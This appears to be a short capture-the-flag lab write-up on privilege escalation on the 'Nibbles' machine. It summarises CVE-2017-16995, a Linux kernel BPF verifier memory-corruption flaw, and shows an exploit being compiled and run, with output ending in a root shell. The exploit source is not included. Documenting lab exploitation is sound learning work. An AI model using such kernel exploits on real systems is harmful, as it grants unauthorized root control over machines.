InfoSec LAB

Nibbles_Privilege_Escalation_3

Created: 2 min read

PEAS discovered that the target system is vulnerable to CVE-2017-16995

CVE-2017-16995

a vulnerability classified as critical has been found in linux kernel up to 4.14.8 (Operating System). Affected is the function check_alu_op of the file kernel/bpf/verifier.c of the component Sign Extension. The manipulation with an unknown input leads to a memory corruption vulnerability. CWE is classifying the issue as CWE-119. The software performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer. This is going to have an impact on confidentiality, integrity, and availability.

Exploit

I found the exploit online

Privilege Escalation

nibbler@nibbles:/tmp$ gcc CVE-2017-16995.c -o CVE-2017-16995
nibbler@nibbles:/tmp$ ./CVE-2017-16995
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880005973100
[*] Leaking sock struct from ffff88003837d400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003234a0c0
[*] uid from cred structure: 1001, matches the current: 1001
[*] hammering cred structure at ffff88003234a0c0
[*] credentials patched, launching shell...
# whoami
root
# hostname
Nibbles
# ifconfig
ens192    link encap:Ethernet  HWaddr 00:50:56:b9:48:c7  
          inet addr:10.10.10.75  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:48c7/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:48c7/64 Scope:Global
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:4188 errors:0 dropped:15 overruns:0 frame:0
          tx packets:3738 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:1208346 (1.2 MB)  TX bytes:1166370 (1.1 MB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:65536  Metric:1
          rx packets:160 errors:0 dropped:0 overruns:0 frame:0
          tx packets:160 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          rx bytes:11840 (11.8 KB)  TX bytes:11840 (11.8 KB)

System Level Compromise

Interactive Graph View

Backlinks